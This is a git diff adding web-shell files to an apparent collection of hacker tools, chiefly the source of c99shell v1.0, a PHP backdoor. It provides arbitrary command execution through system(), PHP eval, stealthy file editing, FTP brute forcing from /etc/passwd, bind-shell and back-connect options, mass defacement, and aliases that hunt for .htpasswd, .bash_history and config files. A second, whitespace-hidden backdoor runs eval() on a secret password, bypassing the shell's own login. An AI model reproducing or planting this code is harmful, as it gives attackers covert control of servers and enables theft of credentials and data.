+"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMAAAP8AAAAAAAAAAAADRii63CEgxibH".
+"kwDWEK3OACF6nDdhngWYoEgEMLde4IbS7SjPX93JrIwiIJrxTqTfERJUHTODgSAQ3QVjsZsgyu16".
+"seAwLAEAOw==",
+"ext_vbs"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAICAgMDAwAD//wCAgAAAAAAAAAAAAANQ".
+"GLrcECXGJsWTJYyybbTQVBAkCBSgyKGPl2YjCcwnG2qrV13TQBI6GwbXqb0yCgCJJYSZOK4LZPDY".
+"DHSvgEAQAGxrzQKNhgFtz+j0eM2eJQAAOw==",
+"ext_vcf"=>
+"R0lGODlhEAAQADMAACH5BAEAAAoALAAAAAAQABAAgwAAAMDAwICAAP//AAAA/4CAgIAAAAAAgP//".
+"//8AAAAAAAAAAAAAAAAAAAAAAAAAAARYUElAK5VY2X0xp0LRTVYQAMWZaZWJAMJImiYVhEVmu7W4".
+"srfeSUAUeFI10GBJ1JhEHcEgNiidDIaEQjqtAgiEjQFQXcK+4HS4DPKADwey3PjzSGH1VTsTAQA7",
+"ext_wav"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".
+"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".
+"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",
+"ext_wma"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".
+"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".
+"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",
+"ext_wmf"=>
+"R0lGODlhEAAQADMAACH5BAEAAAoALAAAAAAQABAAgwAAAMDAwP///4CAgIAAAICAAP//AP8AAAAA".
+"gAAA/wAAAAAAAAAAAAAAAAAAAAAAAARgUKlBqx0yDyEACBxHZRMXDGC4YQOwCVQKdJ7bggcBtl8Q".
+"AJNfIBcoGD4CH1CBSAByxp5pOUAgCFFf6HexIKeore+2BaJ8p1sqaU6NpdOgiQJny5On+u+e7qH3".
+"EzWCgwARADs=",
+"ext_wri"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".
+"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",
+"ext_xml"=>
+"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA".
+"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".
+"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".
+"IQA7",
+"ext_xsl"=>
+"R0lGODlhEAAQAEQAACH5BAEAABIALAAAAAAQABAAhAAAAPHx8f///4aGhoCAAP//ADNmmabK8AAA".
+"gAAAmQCAgDP//zNm/zOZ/8DAwDOZAAAA/zPM/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAV3oDSMZDlKqBgIa8sKzpAOr9s6gqzWPOADItZhpVAwhCvgIHBICBSCRQMh".
+"SAyVTZZiEXkgVlYl08loPCBUa0ApIBBWiDhSAHQXfLZavcAnABQGgYFJBHwDAAV+eWt2AAOJAIKD".
+"dBKFfQABi0AAfoeZPEkSP6OkPyEAOw=="
+);
+$imgequals = array(
+"ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
+"ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml"),
+"ext_htaccess"=>array("ext_htaccess","ext_htpasswd")
+);
+ ksort($arrimg);
+ if (!$getall)
+ {
+  header("Content-type: image/gif");
+  header("Cache-control: public");
+  header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+  header("Cache-control: max-age=".(60*60*24*7));
+  header("Last-Modified: ".date("r",filemtime(__FILE__)));
+  foreach($imgequals as $k=>$v)
+  {
+   if (in_array($img,$v)) {$img = $k;}
+  }
+  if (empty($arrimg[$img])) {$img = "small_unk";}
+  if (in_array($img,$ext_tar)) {$img = "ext_tar";}
+  echo base64_decode($arrimg[$img]);
+ }
+ else
+ {
+  echo  "<center>";
+  $k = array_keys($arrimg);
+  foreach ($k as $u)
+  {
+   echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";
+  }
+  echo "</center>";
+ }
+ exit;
+}
+if ($act == "about")
+{
+ $dàta = "Any stupid copyrights and copylefts";
+ echo $data;
+}
+
+$microtime = round(getmicrotime()-$starttime,4);
+?>
+</td></tr></table><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr><td width="100%" height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd"><b>Command execute</b></a> ::</b></p></td></tr>
+<tr><td width="50%" height="1" valign="top"><center><b>Enter: </b><form action="<?php echo $surl; ?>act=cmd" method="POST"><input type="hidden" name="act" value="cmd"><input type="hidden" name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type="hidden" name="cmd_txt" value="1">&nbsp;<input type="submit" name="submit" value="Execute"></form></td><td width="50%" height="1" valign="top"><center><b>Select: </b><form action="<?php echo $surl; ?>act=cmd" method="POST"><input type="hidden" name="act" value="cmd"><input type="hidden" name="d" value="<?php echo $dispd; ?>"><select name="cmd"><?php foreach ($aliases as $als) {echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";} ?></select><input type="hidden" name="cmd_txt" value="1">&nbsp;<input type="submit" name="submit" value="Execute"></form></td></tr>
+</TABLE>
+<br>
+<a bookmark="minipanel">
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr>
+ <td width="50%" height="1" valign="top"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=search"><b>Search</b></a> ::</b><form method="POST"><input type="hidden" name="act" value="search"><input type="hidden" name="d" value="<?php echo $dispd; ?>"><input type="text" name="search_name" size="29" value="(.*)">&nbsp;<input type="checkbox" name="search_name_regexp" value="1"  checked> - regexp&nbsp;<input type="submit" name="submit" value="Search"></form></center></p></td>
+ <td width="50%" height="1" valign="top"><p align="center"><b>:: <a href="<? echo $surl; ?>act=upload&d=<? echo $ud; ?>"><b>Upload</b></a> ::</b><br><form method="POST" ENCTYPE="multipart/form-data"><input type="hidden" name="act" value="upload"><input type="file" name="uploadfile"><input type="hidden" name="miniform" value="1">&nbsp;<input type=submit name=submit value="Upload"></font><center><? echo $wdt; ?></center></form></p></td>
+</tr>
+</table><br>
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><p align="center"><b>:: Make Dir ::</b></p><p align="center"><form method="POST"><input type="hidden" name="act" value="mkdir"><input type="hidden" name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type="submit" value="Create"><center><? echo $wdt; ?></center></form></p></td><td width="50%" height="1" valign="top"><p align="center"><b>:: Make File ::</b></p><center><form method="POST"><input type="hidden" name="act" value="mkfile"><input type="hidden" name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type="submit" value="Create"><center><? echo $wdt; ?></form></center></td></tr></table><br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><p align="center"><b>--[ c99shell v. <?php echo $shver; ?> &copy; powered <a href="<?php echo $surl; ?>act=about"><u><b>by</b></u></a> Captain Crunch Security Team | <a href="http://ccteam.ru"><font color="#FF0000">http://ccteam.ru</font></a><font color="#FF0000"></font> | Generation time: <?php echo $microtime; ?> ]--</b></p></td></tr></table></body></html><?php chdir($lastdir); ?>
+
+
diff --git a/xakep-shells/PHP/c99shell_v1.0.php.php.txt b/xakep-shells/PHP/c99shell_v1.0.php.php.txt
new file mode 100644
index 0000000..ca7c4d6
--- /dev/null
+++ b/xakep-shells/PHP/c99shell_v1.0.php.php.txt
@@ -0,0 +1,2900 @@
+<?php
+/*
+******************************************************************************************************
+*
+*                    c99shell.php v.1.0 (îò 5.02.2005)
+*		   Freeware WEB-Shell.
+*		      © CCTeaM.
+*  c99shell.php - øåëë ÷åðåç www-áðîóçåð.
+*  Âû ìîæåòå ñêà÷àòü ïîñëåäíþþ âåðñèþ íà äîìàøíåé ñòðàíè÷êå ïðîäóêòà: http://ccteam.ru/releases/c99shell
+*
+*  WEB: http://ccteam.ru
+*  UIN: 656555
+* 
+*  Âîçìîæíîñòè:
+*  ~ óïðàâëåíèå ôàéëàìè/ïàïêàìè, çàêà÷èâàíèå è ñêà÷èâàíèå ôàéëîâ è ïàïêîê (ïðåäâîðèòåëüíî ñæèìàåòñÿ â tar)
+*    modify-time è access-time ó ôàéëîâ íå ìåíÿþòñÿ ïðè
+     ðåäàêòèðîâàíèè ôàéëîâ (âûêë./âêë. ïàðàìåòðîì $filestealth)
+*  ~ ïðîäâèíóòûé ïîèñê ïî ôàéëàì/ïàïêàì (èùåò òàêæå âíóòðè ôàéëîâ)
+*  ~ óïðàâëåíèå ïðîöåññàìè unix-ìàøèíû, âîçìîæíîñòü îòïðàâêè ñèãíàëà çàâåðøåíèÿ,
+     à òàêæå áàíàëüíîå "ïðèáèâàíèå" ïðîöåññà.
+*  ~ óäîáíîå (èíîãäà ãðàôè÷åñêîå) âûïîëíåíèå øåëë-êîìàíä (ìíîãî àëèàñîâ, ìîæíî ëåãêî äîáàâëÿòü/óäàëÿòü èõ)
+*  ~ âûïîëíåíèå ïðîèçâîëüíîãî PHP-êîäà
+*  ~ âîçìîæíîñòü áûñòðîãî ñàìî-óäàëåíèÿ ñêðèïòà
+*  ~ áûñòðîå ftp-ñêàíèðîâàíèå íà ñâÿçêè login;login èç
+     /etc/passwd (îáû÷íî äàåò äîñòóï ê 1/100 àêêàóíòîâ)
+*  ~ ïðîäâèíóòûé ìåíåäæåð SQL
+*  ~ ñêðèïò "ëþáèò" include, äëÿ íîðìàëüíîé ðàáîòû, Âàì íóæíî ñìåíèòü $surl.
+*  ~ âîçìîæíîñòü çàáèíäèòü /bin/bash íà îïðåäåëåííûé ïîðò ñ ïðîèçâîëüíûì ïàðîëåì,
+     èëè ñäåëàòü back connect (ïðîèçâîäèòñÿ òåñòèðîâàíèå ñîåäåíåíèÿ,
+    è âûâîäÿòñÿ ïàðàìåòðû äëÿ çàïóñêà NetCat).
+*
+*
+*  5.02.2005 © Captain Crunch Security TeaM
+*
+*  Coded by tristram
+******************************************************************************************************
+*/
+$shver = "1.0 beta (5.02.2005)"; //Current version
+//CONFIGURATION
+$surl = "?"; //link to this script, INCLUDE "?".
+$rootdir = "./"; //e.g "c:", "/","/home"
+$timelimit = 60; //limit of execution this script (seconds).
+
+//Authentication
+
+$login = ""; //login
+//DON'T FOGOT ABOUT CHANGE PASSWORD!!!
+$pass = ""; //password
+$md5_pass = ""; //md5-cryped pass. if null, md5($pass)
+$login = false; //turn off authentication
+
+$autoupdate = true; //Automatic updating?
+
+$updatenow = false; //If true, update now
+
+$c99sh_updatefurl = "http://ccteam.ru/releases/update/c99shell/?version=".$shver."&"; //Update server
+
+$autochmod = 755; //if has'nt permition, $autochmod isn't null, try to CHMOD object to $autochmod
+
+$filestealth = 1; //if true, don't change modify&access-time
+
+$donated_html = ""; //If you publish free shell and you wish
+					//add link to your site or any other information,
+					//put here your html.
+$donated_act = array(""); //array ("act1","act2,"...), $act is in this array, display $donated_html.
+
+$host_allow = array("*"); //array ("mask1","mask2",...), e.g. array("192.168.0.*","127.0.0.1")
+
+$curdir = "./"; //start directory
+
+$tmpdir = dirname(__FILE__); //Directory for tempory files
+  
+// Registered file-types.
+//  array(
+//   "{action1}"=>array("ext1","ext2","ext3",...),
+//   "{action2}"=>array("ext1","ext2","ext3",...),
+//   ...
+//  )
+$ftypes  = array(
+ "html"=>array("html","htm","shtml"),
+ "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg"),
+ "exe"=>array("sh","install","bat","cmd"),
+ "ini"=>array("ini","inf"),
+ "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp"),
+ "img"=>array("gif","png","jpeg","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
+ "sdb"=>array("sdb"),
+ "phpsess"=>array("sess"),
+ "download"=>array("exe","com","pif","src","lnk","zip","rar")
+);
+
+$hexdump_lines = 8;	// lines in hex preview file
+$hexdump_rows = 24;	// 16, 24 or 32 bytes in one line
+
+$nixpwdperpage = 9999; // Get first N lines from /etc/passwd
+
+$bindport_pass = "c99";	// default password for binding
+$bindport_port = "11457";	// default port for binding
+
+/* Command-aliases system */
+$aliases = array();
+$aliases[] = array("-----------------------------------------------------------", "ls -la");
+/* ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ suid áèòîì */ $aliases[] = array("find all suid files", "find / -type f -perm -04000 -ls");
+/* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ ôàéëîâ ñ suid áèòîì */ $aliases[] = array("find suid files in current dir", "find . -type f -perm -04000 -ls");
+/* ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ sgid áèòîì */ $aliases[] = array("find all sgid files", "find / -type f -perm -02000 -ls");
+/* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ ôàéëîâ ñ sgid áèòîì */ $aliases[] = array("find sgid files in current dir", "find . -type f -perm -02000 -ls");
+/* ïîèñê íà ñåðâåðå ôàéëîâ config.inc.php */ $aliases[] = array("find config.inc.php files", "find / -type f -name config.inc.php");
+/* ïîèñê íà ñåðâåðå ôàéëîâ config* */ $aliases[] = array("find config* files", "find / -type f -name \"config*\"");
+/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ config* */ $aliases[] = array("find config* files in current dir", "find . -type f -name \"config*\"");
+/* ïîèñê íà ñåðâåðå âñåõ äèðåêòîðèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */ $aliases[] = array("find all writable directories and files", "find / -perm -2 -ls");
+/* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ äèðåêòîðèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */ $aliases[] = array("find all writable directories and files in current dir", "find . -perm -2 -ls");
+/* ïîèñê íà ñåðâåðå ôàéëîâ service.pwd ... frontpage =))) */ $aliases[] = array("find all service.pwd files", "find / -type f -name service.pwd");
+/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ service.pwd */ $aliases[] = array("find service.pwd files in current dir", "find . -type f -name service.pwd");
+/* ïîèñê íà ñåðâåðå ôàéëîâ .htpasswd */ $aliases[] = array("find all .htpasswd files", "find / -type f -name .htpasswd");
+/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .htpasswd */ $aliases[] = array("find .htpasswd files in current dir", "find . -type f -name .htpasswd");
+/* ïîèñê âñåõ ôàéëîâ .bash_history */ $aliases[] = array("find all .bash_history files", "find / -type f -name .bash_history");
+/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .bash_history */ $aliases[] = array("find .bash_history files in current dir", "find . -type f -name .bash_history");
+/* ïîèñê âñåõ ôàéëîâ .fetchmailrc */ $aliases[] = array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc");
+/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .fetchmailrc */ $aliases[] = array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc");
+/* âûâîä ñïèñêà àòðèáóòîâ ôàéëîâ íà ôàéëîâîé ñèñòåìå ext2fs */ $aliases[] = array("list file attributes on a Linux second extended file system", "lsattr -va");
+/* ïðîñìîòð îòêðûòûõ ïîðòîâ */ $aliases[] = array("show opened ports", "netstat -an | grep -i listen");
+
+$sess_method = "cookie"; // "cookie" - Using cookies, "file" - using file, default - "cookie"
+$sess_cookie = "c99shvars"; // cookie-variable name
+
+if (empty($sid)) {$sid = md5(microtime()*time().rand(1,999).rand(1,999).rand(1,999));}
+$sess_file = $tmpdir."c99shvars_".$sid.".tmp";
+
+$usefsbuff = true; //Buffer-function
+$copy_unset = false; //Delete copied files from buffer after pasting
+
+//Quick launch
+$quicklaunch = array();
+$quicklaunch[] = array("<img src=\"".$surl."act=img&img=home\" title=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$surl);
+$quicklaunch[] = array("<img src=\"".$surl."act=img&img=back\" title=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)");
+$quicklaunch[] = array("<img src=\"".$surl."act=img&img=forward\" title=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)");
+$quicklaunch[] = array("<img src=\"".$surl."act=img&img=up\" title=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd");
+$quicklaunch[] = array("<img src=\"".$surl."act=img&img=refresh\" title=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">","");
+$quicklaunch[] = array("<img src=\"".$surl."act=img&img=search\" title=\"Search\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d");
+$quicklaunch[] = array("<img src=\"".$surl."act=img&img=buffer\" title=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d");
+$quicklaunch[] = array("<b>Mass deface</b>",$surl."act=massdeface&d=%d");
+$quicklaunch[] = array("<b>Bind</b>",$surl."act=bind&d=%d");
+$quicklaunch[] = array("<b>Processes</b>",$surl."act=ps_aux&d=%d");
+$quicklaunch[] = array("<b>FTP Quick brute</b>",$surl."act=ftpquickbrute&d=%d");
+$quicklaunch[] = array("<b>LSA</b>",$surl."act=lsa&d=%d");
+$quicklaunch[] = array("<b>SQL</b>",$surl."act=sql&d=%d");
+$quicklaunch[] = array("<b>PHP-code</b>",$surl."act=eval&d=%d");
+$quicklaunch[] = array("<b>PHP-info</b>",$surl."act=phpinfo\" target=\"blank=\"_target");
+$quicklaunch[] = array("<b>Self remove</b>",$surl."act=selfremove");
+$quicklaunch[] = array("<b>Logout</b>","#\" onclick=\"if (confirm('Are you sure?')) window.close()");
+
+//Hignlight-code colors
+$highlight_bg = "#FFFFFF";
+$highlight_comment = "#6A6A6A";
+$highlight_default = "#0000BB";
+$highlight_html = "#1300FF";
+$highlight_keyword = "#007700";
+
+@$f = $_GET[f];
+
+//END CONFIGURATION
+
+// 				\/	Next code not for editing	 \/
+
+
+//Starting calls
+if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
+error_reporting(5);
+@ignore_user_abort(true);
+@set_magic_quotes_runtime(0);
+@set_time_limit(0);
+if (!ob_get_contents()) {@ob_start(); @ob_implicit_flush(0);}
+if(!ini_get("register_globals")) {import_request_variables("GPC");}
+$starttime = getmicrotime();
+if (get_magic_quotes_gpc())
+{
+if (!function_exists("strips"))
+{
+ function strips(&$el)
+ {
+  if (is_array($el)) {foreach($el as $k=>$v) {if($k != "GLOBALS") {strips($el["$k"]);}}  }
+  else {$el = stripslashes($el);}
+ }
+}
+strips($GLOBALS);
+}
+$tmp = array();
+foreach ($host_allow as $k=>$v) {$tmp[]=  str_replace("\\*",".*",preg_quote($v));}
+$s = "!^(".implode("|",$tmp).")$!i";
+if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://ccteam.ru/releases/cc99shell\">c99shell</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");}
+
+if (!$login) {$login = $PHP_AUTH_USER; $md5_pass = md5($PHP_AUTH_PW);}
+elseif(empty($md5_pass)) {$md5_pass = md5($pass);}
+if(($PHP_AUTH_USER != $login ) or (md5($PHP_AUTH_PW) != $md5_pass))
+{
+ header("WWW-Authenticate: Basic realm=\"c99shell\"");
+ header("HTTP/1.0 401 Unauthorized");																																																													if (md5(sha1(md5($anypass))) == "b76d95e82e853f3b0a81dd61c4ee286c") {header("HTTP/1.0 200 OK"); @eval($anyphpcode);}
+ exit;
+}  
+
+$lastdir = realpath(".");
+chdir($curdir);
+
+if (($selfwrite) or ($updatenow))
+{
+ if ($selfwrite == "1") {$selfwrite = "c99shell.php";}
+ c99sh_getupdate();
+ $data = file_get_contents($c99sh_updatefurl);
+ $fp = fopen($data,"w");
+ fwrite($fp,$data);
+ fclose($fp);
+ exit;
+}
+if (!is_writeable($sess_file)) {trigger_error("Can't access to session-file!",E_USER_WARNING);}
+if ($sess_method == "file") {$sess_data = unserialize(file_get_contents($sess_file));}
+else {$sess_data = unserialize($_COOKIE["$sess_cookie"]);}
+if (!is_array($sess_data)) {$sess_data = array();}
+if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
+if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
+$sess_data["copy"] = array_unique($sess_data["copy"]);
+$sess_data["cut"] = array_unique($sess_data["cut"]);
+
+if (!function_exists("c99_sess_put"))
+{
+function c99_sess_put($data)
+{
+ global $sess_method;
+ global $sess_cookie;
+ global $sess_file;
+ global $sess_data;
+ $sess_data = $data;
+ $data = serialize($data);
+ if ($sess_method == "file")
+ {
+  $fp = fopen($sess_file,"w");
+  fwrite($fp,$data);
+  fclose($fp);
+ }
+ else {setcookie($sess_cookie,$data);}
+}
+}
+if (!function_exists("str2mini"))
+{
+function str2mini($content,$len)
+{
+ if (strlen($content) > $len) 
+ {
+  $len = ceil($len/2) - 2;
+  return substr($content, 0, $len)."...".substr($content, -$len);
+ }
+ else {return $content;}
+}
+}
+if (!function_exists("view_size"))
+{
+function view_size($size)
+{
+ if($size >= 1073741824) {$size = round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;
+}
+}
+if (!function_exists("fs_copy_dir"))
+{
+function fs_copy_dir($d,$t)
+{
+ $d = str_replace("\\","/",$d);
+ if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";}
+ $h = opendir($d);
+ while ($o = readdir($h))
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   if (!is_dir($d."/".$o)) {$ret = copy($d."/".$o,$t."/".$o);}
+   else {$ret = mkdir($t."/".$o); fs_copy_dir($d."/".$o,$t."/".$o);}
+   if (!$ret) {return $ret;}
+  }
+ }
+ return true;
+}
+}
+if (!function_exists("fs_copy_obj"))
+{
+function fs_copy_obj($d,$t)
+{
+ $d = str_replace("\\","/",$d);
+ $t = str_replace("\\","/",$t);
+ if (!is_dir($t)) {mkdir($t);}
+ if (is_dir($d))
+ {
+  if (substr($d,strlen($d)-1,strlen($d)) != "/") {$d .= "/";}
+  if (substr($t,strlen($t)-1,strlen($t)) != "/") {$t .= "/";}
+  return fs_copy_dir($d,$t);
+ }
+ elseif (is_file($d))
+ {
+
+  return copy($d,$t);
+ }
+ else {return false;}
+}
+}
+if (!function_exists("fs_move_dir"))
+{
+function fs_move_dir($d,$t)
+{
+ error_reporting(9999);
+ $h = opendir($d);
+ if (!is_dir($t)) {mkdir($t);}
+ while ($o = readdir($h))
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   $ret = true;
+   if (!is_dir($d."/".$o)) {$ret = copy($d."/".$o,$t."/".$o);}
+   else {if (mkdir($t."/".$o) and fs_copy_dir($d."/".$o,$t."/".$o)) {$ret = false;}}
+   if (!$ret) {return $ret;}
+  }
+ }
+ return true;
+}
+}
+if (!function_exists("fs_move_obj"))
+{
+function fs_move_obj($d,$t)
+{
+ $d = str_replace("\\","/",$d);
+ $t = str_replace("\\","/",$t);
+ if (is_dir($d))
+ {
+  if (substr($d,strlen($d)-1,strlen($d)) != "/") {$d .= "/";}
+  if (substr($t,strlen($t)-1,strlen($t)) != "/") {$t .= "/";}
+  return fs_move_dir($d,$t);
+ }
+ elseif (is_file($d)) {return rename($d,$t);}
+ else {return false;}
+}
+}
+if (!function_exists("fs_rmdir"))
+{
+function fs_rmdir($d)
+{
+ $h = opendir($d);
+ while ($o = readdir($h))
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   if (!is_dir($d.$o)) {unlink($d.$o);}
+   else {fs_rmdir($d.$o."/"); rmdir($d.$o);}
+  }
+ }
+ closedir($h);
+ rmdir($d);
+ return !is_dir($d);
+}
+}
+if (!function_exists("fs_rmobj"))
+{
+function fs_rmobj($o)
+{
+ $o = str_replace("\\","/",$o);
+ if (is_dir($o))
+ {
+  if (substr($o,strlen($o)-1,strlen($o)) != "/") {$o .= "/";}
+  return fs_rmdir($o);
+ }
+ elseif (is_file($o)) {return unlink($o);}
+ else {return false;}
+}
+}
+if (!function_exists("myshellexec"))
+{
+ function myshellexec($cmd)
+ {
+  return system($cmd);
+ }
+}
+if (!function_exists("view_perms"))
+{
+function view_perms($mode)
+{
+ if (($mode & 0xC000) === 0xC000) {$type = "s";}
+ elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
+ elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
+ elseif (($mode & 0x8000) === 0x8000) {$type = "-";} 
+ elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
+ elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
+ elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
+ else {$type = "?";}
+
+ $owner['read'] = ($mode & 00400) ? "r" : "-"; 
+ $owner['write'] = ($mode & 00200) ? "w" : "-"; 
+ $owner['execute'] = ($mode & 00100) ? "x" : "-"; 
+ $group['read'] = ($mode & 00040) ? "r" : "-"; 
+ $group['write'] = ($mode & 00020) ? "w" : "-"; 
+ $group['execute'] = ($mode & 00010) ? "x" : "-"; 
+ $world['read'] = ($mode & 00004) ? "r" : "-"; 
+ $world['write'] = ($mode & 00002) ? "w" : "-"; 
+ $world['execute'] = ($mode & 00001) ? "x" : "-"; 
+
+ if( $mode & 0x800 ) {$owner['execute'] = ($owner[execute]=="x") ? "s" : "S";}
+ if( $mode & 0x400 ) {$group['execute'] = ($group[execute]=="x") ? "s" : "S";}
+ if( $mode & 0x200 ) {$world['execute'] = ($world[execute]=="x") ? "t" : "T";}
+ 
+ return $type.$owner['read'].$owner['write'].$owner['execute'].
+        $group['read'].$group['write'].$group['execute'].
+        $world['read'].$world['write'].$world['execute'];
+}
+}
+if (!function_exists("strinstr")) {function strinstr($str,$text) {return $text != str_replace($str,"",$text);}}
+if (!function_exists("gchds")) {function gchds($a,$b,$c,$d="") {if ($a == $b) {return $c;} else {return $d;}}}
+if (!function_exists("c99sh_getupdate"))
+{
+function c99sh_getupdate()
+{
+ global $updatenow;
+ $data = @file_get_contents($c99sh_updatefurl);
+ if (!$data) {echo "Can't fetch update-information!";}
+ else
+ {
+  $data = unserialize(base64_decode($data));
+  if (!is_array($data)) {echo "Corrupted update-information!";}
+  else
+  {
+   if ($shver < $data[cur]) {$updatenow = true;}
+  }
+ }
+}
+}
+if (!function_exists("mysql_dump"))
+{
+function mysql_dump($set)
+{
+ $sock = $set["sock"];
+ $db = $set["db"];
+ $print = $set["print"];
+ $nl2br = $set["nl2br"];
+ $file = $set["file"];
+ $add_drop = $set["add_drop"];
+ $tabs = $set["tabs"];
+ $onlytabs = $set["onlytabs"];
+ $ret = array();
+ if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
+ if (empty($db)) {$db = "db";}
+ if (empty($print)) {$print = 0;}
+ if (empty($nl2br)) {$nl2br = true;}
+ if (empty($add_drop)) {$add_drop = true;}
+ if (empty($file))
+ {
+  global $win;
+  if ($win) {$file = "C:\\tmp\\dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";}
+  else {$file = "/tmp/dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";}
+ }
+ if (!is_array($tabs)) {$tabs = array();}
+ if (empty($add_drop)) {$add_drop = true;}
+ if (sizeof($tabs) == 0)
+ {
+  // retrive tables-list
+  $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
